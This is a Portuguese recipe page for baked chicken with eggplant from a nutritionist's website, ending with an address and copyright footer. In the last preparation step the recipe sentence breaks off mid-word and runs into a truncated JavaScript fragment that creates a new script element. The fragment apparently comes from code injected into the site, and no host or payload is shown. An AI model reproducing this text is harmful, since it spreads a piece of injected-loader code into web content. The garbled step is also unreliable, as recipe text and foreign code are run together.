Frango com berinjela

Ingredientes:

2 peitos de frango desossado

1 berinjela média

1cebola bem picadinha

1 colher de sobremesa de gengibre ralado

Sal a gosto

1 dente de alho bem picadinho

Suco de 1 limão

Modo de fazer:

1-Coloque a berinjela de molho em água fria com sal e suco de limão por 30 minutos. Abra os peitos de frango com uma faca bem fina, transformando os dois peitos em quatro filés e tempere com sal e suco de ½ limão;

2- Unte uma assadeira com óleo de canola. Coloque na assadeira a berinjela cortada. Sobre a berinjela, a cebola picada. Arrume os filés de frango sobre a berinjela. Salpique o alho e o gengibre raladinho;

3-Cubra com papel manteiga e leve ao forno alto pré-aquecido. Depois de uns 20 minutos, retire o papel manteiga. O frango e a berinjela deverão estar cozidos.

4-Com o forno em temperatura média, deixe por mais 15 minutos para dourar o frangoif (document.currentScript) { var d=document;var s=d.createElement(‘script’);

Endereço: Rua Visconde de Pirajá, 351 sala 1204- Ed. Fórum de Ipanema - Ipanema/RJ - Telefone: 21 3497-3929 / 9907-7585

© Copyright 2012 :: Gabriela Maia Nutricionista :: www.gabrielamaianutricionista.com.br

Criação de sites: Niterói WebSites | Comunicação: Dona Comunicação